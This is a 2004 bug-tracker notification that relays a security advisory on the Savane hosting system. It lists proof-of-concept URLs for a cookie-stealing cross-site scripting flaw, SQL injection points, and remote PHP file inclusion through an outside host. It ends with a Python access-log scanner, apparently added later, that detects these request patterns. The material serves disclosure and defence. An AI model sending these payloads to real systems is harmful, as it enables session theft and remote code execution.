This mail is an automated notification from the bugs tracker of the project: Savane.
/**************************************************************************/
[bugs #724] Full Item Snapshot:

URL: <http://gna.org/bugs/?func=detailitem&item_id=724>
Project: Savane
Submitted by: Joxean Koret
On: Thu 16/09/04 at 21:53
Category: Web Frontend
Severity: 6 - Security
Priority: C - Normal
Resolution: None
Privacy: Private
Assigned to: None
Status: Open
Release: Latest
Planned Release:
Summary: Multiple vulnerabilities in Savane Product

Original Submission:

---------------------------------------------------------------------------
Multiple Vulnerabilities in Savane
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Savane Latest (Released at 24-Aug-2004 08:23)

Savane is a Web-based Libre Software hosting system. It currently includes issue tracking (bugs, task, support), project and member management, mailing lists, and individual account maintenance.

Web: https://gna.org/projects/savane

---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting

A1. I have found a Cross Site Scripting vulnerability in the PHP login form. To try the vulnerability you can view the following URL:

http(s)://<site-with-savane>/account/login.php?form_loginname="><script>alert(document.cookie)</script>

B. SQL Injection Vulnerabilities

B1. I have found various SQL Injection vulnerabilities. The Savane product is only affected if:

A) The environment variable SV_LOCAL_INC_PREFIX is defined, and
B) PHP is configured with "magic_quotes_gpc" set to "On", and
C) The register_globals directive is set to on in the file php.ini

The following PHP scripts are vulnerable:

http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION
http://localhost/savane/account/pending-resend.php?form_use_cvsadmin=SQL_INJECTION
http://localhost/savane/account/lostpw-confirm.php?form_loginname=SQL_Injection
http://localhost/savane/account/logout.php?session_hash=SQLInjection
http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION

C. Remote Code Execution

C1. The first remote PHP code execution vulnerability that I found is only exploitable if magic_quotes_gpc is set to on. To try this:

http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com?

I have found various other vulnerabilities of the same kind, but they are only exploitable if the SV_LOCAL_INC_PREFIX environment variable is defined (always) and register_globals is set to on. Examples:

http://localhost/savane/include/pre.php?sys_urlroot=http://fuckingsite.com?
http://localhost/savane/account/lostlogin.php?sys_urlroot=http://fuckingsite.com?

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

---------------------------------------------------------------------------
Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

CC List
-------

CC Address                          | Comment
------------------------------------+-----------------------------
beuc --AT-- gnu --DOT-- org         | I think that you need to be advised.
For detailed info, follow this link:
<http://gna.org/bugs/?func=detailitem&item_id=724>

_______________________________________________
Message sent via/by Gna!
http://gna.org/
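The three request patterns the advisory lists (script tags in form_loginname, SQL metacharacters in the session and account parameters, and a client-supplied sys_urlroot pointing at a remote host, which a server-side configuration variable should never be) can all be spotted in the web server's access log. The Python below is an added example written for this page, not code from the advisory or from the Savane project; the log lines are constructed, the host attacker.invalid is a placeholder, and only the parameter and script names come from the advisory.

```python
"""Scan Apache combined-format access logs for the request patterns named in
the Savane advisory. Example code added for this page; the log lines are
constructed, not captured from a real host."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Server-side configuration names that must never arrive from the client;
# with register_globals on, a GET parameter of this name overrides the value.
CONFIG_PARAMS = {"sys_urlroot"}
# Parameters the advisory names as SQL injection sinks.
SQL_PARAMS = {"form_use_cvsadmin", "form_loginname", "session_hash", "user_id"}
SQL_META = re.compile(r"'|;|--|/\*|\b(?:union|select|or|and)\b", re.I)
HTML_META = re.compile(r'<|>|"|javascript:', re.I)

# Constructed sample log (placeholder addresses and host).
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [16/Sep/2004:21:53:00 +0200] "GET /account/login.php'
    '?form_loginname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E '
    'HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [16/Sep/2004:21:53:01 +0200] "GET /include/stats_function.php'
    '?sys_urlroot=http://attacker.invalid/ HTTP/1.0" 200 120 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [16/Sep/2004:21:53:02 +0200] "GET /account/logout.php'
    '?session_hash=x%27%20OR%20%271%27%3D%271 HTTP/1.0" 302 0 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [16/Sep/2004:21:54:00 +0200] "GET /account/login.php'
    '?form_loginname=alice HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
])


def analyse_request(target):
    """Return a list of findings for one request target (path plus query)."""
    parts = urlsplit(target)
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)  # second pass catches double-encoded payloads
            kind = None
            if name in CONFIG_PARAMS:
                # A URL in a config variable is the remote-include signature.
                kind = "remote-include" if re.match(r"https?://", value, re.I) else "config-override"
            elif name == "form_loginname" and HTML_META.search(value):
                kind = "xss"
            elif name in SQL_PARAMS and SQL_META.search(value):
                kind = "sqli"
            if kind:
                findings.append({"path": parts.path, "kind": kind,
                                 "param": name, "value": value})
    return findings


def scan_log(text):
    """Apply analyse_request to every parseable line; attach client ip and status."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for f in analyse_request(m.group("target")):
            f.update(ip=m.group("ip"), status=m.group("status"))
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['kind']:15} {f['path']} {f['param']}={f['value']!r}")
```

The config-override rule is the one worth keeping after the XSS and SQL patterns are fixed: any request carrying sys_urlroot (or another sys_* name) is abnormal regardless of its value, so it flags probing even when the include itself fails.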
